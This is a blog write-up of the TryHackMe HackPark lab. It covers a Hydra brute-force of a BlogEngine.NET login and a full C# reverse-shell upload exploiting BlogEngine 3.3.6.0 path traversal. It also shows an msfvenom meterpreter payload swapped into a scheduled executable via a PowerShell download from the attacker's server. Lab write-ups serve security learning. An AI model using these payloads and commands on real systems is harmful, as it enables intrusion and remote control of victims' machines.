u915

Daniel Cano MerchΓ‘n - Hacking & Tech

Writeup Tryhackme Hackpark

Writeup about the Tryhackme machine Hackpark

0 - Basic info

Windows machine

1 - Reconnaissance and enumeration

Starting with a nmap scan:

sudo nmap -sS -sC -sV -O -p- -oN scan.txt --script vuln 10.10.πŸ˜„ -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-15 21:08 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.πŸ˜„
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.πŸ˜„
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.πŸ˜„:80/
|     Form id: aspnetform
|     Form action: /
|     
|     Path: http://10.10.πŸ˜„:80/Account/login.aspx?ReturnURL=/admin/
|     Form id: form1
|     Form action: login.aspx?ReturnURL=%2fadmin%2f
|     
|     Path: http://10.10.πŸ˜„:80/author/Admin
|     Form id: aspnetform
|     Form action: /author/Admin
|     
|     Path: http://10.10.πŸ˜„:80/archive
|     Form id: aspnetform
|     Form action: /archive
|     
|     Path: http://10.10.πŸ˜„:80/post/welcome-to-hack-park
|     Form id: aspnetform
|_    Form action: /post/welcome-to-hack-park
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /calendar/cal_search.php: ExtCalendar
|   /robots.txt: Robots file
|   /calendar/cal_cat.php: Calendarix
|   /archive/: Potentially interesting folder
|   /archives/: Potentially interesting folder
|   /author/: Potentially interesting folder
|   /contact/: Potentially interesting folder
|   /contacts/: Potentially interesting folder
|   /search/: Potentially interesting folder
|_  /search-ui/: Potentially interesting folder
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
|_http-server-header: Microsoft-IIS/8.5
|_http-sql-injection: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3389/tcp open  ssl/ms-wbt-server?
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 1024
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_sslv2-drown: 
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (98%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (98%), Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 426.68 seconds

Nmap shows the port 80 and 3389. Searching on the port 80 there is a blog page. Nothing usefull but a login page can be found on the top right corner, inside the hamburguer button.

alt text

alt text

Finally a blogengine.net login form is shown

alt text

Trying to bruteforce the login form using the common admin username. To do that I captured the login form POST with Burpsuite and later the post payload is used with Hydra: Also using the wordlist rockyou.txt as expected :) Here is the full trace:

β”Œβ”€β”€(u915β˜ πŸ˜„)-[~/Escritorio/tryhackme/Hackpark]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.πŸ˜„ http-post-form  "/Account/login.aspx:__VIEWSTATE=JPTbjwirnDJFCEBbQeN7xJtAGy%2Fq57IlIu8y4YlcYTE3zE2dqt49nK9LJsT6c9m5B89q0bRtC4p7IMAtEqMOl5jlBvvNPM46zNTCrTHRuoj1d5vaHJZH39tets2x6aH8%2BPNFcuum%2F8zzHHzw2T21uI77mXGALnl358tmuF6S4bG9sE%2BR&__EVENTVALIDATION=Gg4JqBaoqPoG0S8pdtQrXk3A3WwpiSdToFueLPLLMnmAGN%2F%2B466sLluOECWRSfmq%2F07I8tp6CdcwKvRNWeQCM8dtvldiZQkCUTyZxuQPjWQ8%2FHqXb31A7%2FawrnliIsw%2BR07OieBScmCyTPZoUs0kY8CG%2FB7tZ8YPzm%2F%2Fau4T7xQivjpo&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n:Login failed"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-01 12:56:49
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.πŸ˜„:80/Account/login.aspx:__VIEWSTATE=JPTbjwirnDJFCEBbQeN7xJtAGy%2Fq57IlIu8y4YlcYTE3zE2dqt49nK9LJsT6c9m5B89q0bRtC4p7IMAtEqMOl5jlBvvNPM46zNTCrTHRuoj1d5vaHJZH39tets2x6aH8%2BPNFcuum%2F8zzHHzw2T21uI77mXGALnl358tmuF6S4bG9sE%2BR&__EVENTVALIDATION=Gg4JqBaoqPoG0S8pdtQrXk3A3WwpiSdToFueLPLLMnmAGN%2F%2B466sLluOECWRSfmq%2F07I8tp6CdcwKvRNWeQCM8dtvldiZQkCUTyZxuQPjWQ8%2FHqXb31A7%2FawrnliIsw%2BR07OieBScmCyTPZoUs0kY8CG%2FB7tZ8YPzm%2F%2Fau4T7xQivjpo&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n:Login failed
[80][http-post-form] host: 10.10.πŸ˜„   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-01 12:57:37

So the credentials are admin/1qaz2wsx

2 - Vulnerability Identification

Inside the dashboard, on the menu about we can find the following info:

            Version: 3.3.6.0                
            Configuration: Single blog                
            Trust level: Unrestricted                
            Identity: IIS APPPOOL\Blog                
            Blog provider: XmlBlogProvider                
            Membership provider: XmlMembershipProvider                
            Role provider: XmlRoleProvider    

So the version 3.3.6.0 is vulnerable and there are exploits available:

https://www.exploit-db.com/exploits/46353

3 - Exploit

Following the exploit writeup, editing a post and clicking on the icon that looks like an open file in the toolbar you can upload a script through the file manager.

The file will be accesible on the path /App_Data/files

So with basic changes like the port and ip, the file is uploaded to the file manager. The name is important, do not change it, PostView.ascx

http://10.10.πŸ˜„//admin/app/editor/editpost.cshtml

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
	static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

	using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.πŸ˜„", 4445)) {
		using(System.IO.Stream stream = client.GetStream()) {
			using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
				streamWriter = new System.IO.StreamWriter(stream);
						
				StringBuilder strInput = new StringBuilder();

				System.Diagnostics.Process p = new System.Diagnostics.Process();
				p.StartInfo.FileName = "cmd.exe";
				p.StartInfo.CreateNoWindow = true;
				p.StartInfo.UseShellExecute = false;
				p.StartInfo.RedirectStandardOutput = true;
				p.StartInfo.RedirectStandardInput = true;
				p.StartInfo.RedirectStandardError = true;
				p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
				p.Start();
				p.BeginOutputReadLine();

				while(true) {
					strInput.Append(rdr.ReadLine());
					p.StandardInput.WriteLine(strInput);
					strInput.Remove(0, strInput.Length);
				}
			}
		}
    	}
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
   	StringBuilder strOutput = new StringBuilder();

       	if (!String.IsNullOrEmpty(outLine.Data)) {
       		try {
                	strOutput.Append(outLine.Data);
                    	streamWriter.WriteLine(strOutput);
                    	streamWriter.Flush();
                } catch (Exception err) { }
        }
    }

</script>

Handler on my machine:

nc -lvp 4445

Triggering the script: http://10.10.πŸ˜„/?theme=../../App_Data/files

Great, a low privileged reverse shell done:

whoami
iis apppool\blog

4 - Post-Exploitation and privilege escalation

On this part I used winPEAS to scalate privileges and I found this interesting information:

https://github.com/carlospolop/privilege-eescalation-awesome-scripts-suite/tree/master/winPEAS

                                    
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Key: WScheduler
Folder: C:\Program Files (x86)\SystemScheduler
FolderPerms: Everyone [WriteData/CreateFiles]

skipping 1 line
FilePerms: Everyone [WriteData/CreateFiles]

So the binaries can be modified, that sounds interesting. Searching inside the path: C:\Program Files (x86)\SystemScheduler

meterpreter > cd Events
meterpreter > dir
Listing: c:\program files (x86)\Systemscheduler\Events
======================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  1927   fil   2019-08-05 00:05:19 +0200  20198415519.INI
100666/rw-rw-rw-  37381  fil   2019-08-05 00:06:01 +0200  20198415519.INI_LOG.txt
100666/rw-rw-rw-  290    fil   2020-10-02 23:50:12 +0200  2020102145012.INI
100666/rw-rw-rw-  186    fil   2021-06-01 12:01:40 +0200  Administrator.flg
100666/rw-rw-rw-  182    fil   2021-06-01 12:01:07 +0200  SYSTEM_svc.flg
100666/rw-rw-rw-  0      fil   2021-06-01 12:01:40 +0200  Scheduler.flg
100666/rw-rw-rw-  449    fil   2019-08-04 13:36:53 +0200  SessionInfo.flg
100666/rw-rw-rw-  0      fil   2021-06-01 12:01:07 +0200  service.flg

There are interesting logs, looking inside:

meterpreter > cat 20198415519.INI_LOG.txt
08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
08/04/19 15:07:00,Event Started Ok, (Administrator)
08/04/19 15:07:34,Process Ended. PID:2680,ExitCode:4,Message.exe (Administrator)
08/04/19 15:08:00,Event Started Ok, (Administrator)
08/04/19 15:08:33,Process Ended. PID:2768,ExitCode:4,Message.exe (Administrator)
08/04/19 15:09:00,Event Started Ok, (Administrator)
08/04/19 15:09:34,Process Ended. PID:3024,ExitCode:4,Message.exe (Administrator)
08/04/19 15:10:00,Event Started Ok, (Administrator)
08/04/19 15:10:33,Process Ended. PID:1556,ExitCode:4,Message.exe (Administrator)
08/04/19 15:11:00,Event Started Ok, (Administrator)
08/04/19 15:11:33,Process Ended. PID:468,ExitCode:4,Message.exe (Administrator)
08/04/19 15:12:00,Event Started Ok, (Administrator)
08/04/19 15:12:33,Process Ended. PID:2244,ExitCode:4,Message.exe (Administrator)
08/04/19 15:13:00,Event Started Ok, (Administrator)
08/04/19 15:13:33,Process Ended. PID:1700,ExitCode:4,Message.exe (Administrator)
08/04/19 16:43:00,Event Started Ok,Can not display reminders while logged out. (SYSTEM_svc)*
08/04/19 16:44:01,Event Started Ok, (Administrator)
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
08/04/19 16:45:00,Event Started Ok, (Administrator)
08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator)
08/04/19 16:46:00,Event Started Ok, (Administrator)

So the file Message.exe is executed as Administrator

The strategy is very simple, just replacing the file Message.exe with a crafted msfvenom .exe to generate a reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.πŸ˜„  LPORT=9990 -f exe -o Message.exe

Served with python on my machine to the tryhackme box and later downloaded with powershell

python3 -m http.server 7777
powershell -c "Invoke-WebRequest -Uri 'http://10.9.πŸ˜„:7777/Message.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"

after a few seconds it works. So the machine is rooted:

[*] Sending stage (176195 bytes) to 10.10.πŸ˜„
[*] Meterpreter session 1 opened (10.9.**.**:3456 -> 10.10.πŸ˜„:52832) at 2020-05-17 19:19:03 +0200
meterpreter > getuid 
Server username: HACKPARK\Administrator

Finally getting the flags:

meterpreter > cat user.txt 
759bπŸ˜„
meterpreter > cd C:\users\administrator\desktop
meterpreter > ls
Listing: C:\users\administrator\desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  1029  fil   2019-08-04 13:36:42 +0200  System Scheduler.lnk
100666/rw-rw-rw-  282   fil   2019-08-03 19:43:54 +0200  desktop.ini
100666/rw-rw-rw-  32    fil   2019-08-04 20:48:59 +0200  root.txt

meterpreter > cat root.txt
7e13πŸ˜„

Thanks for reading!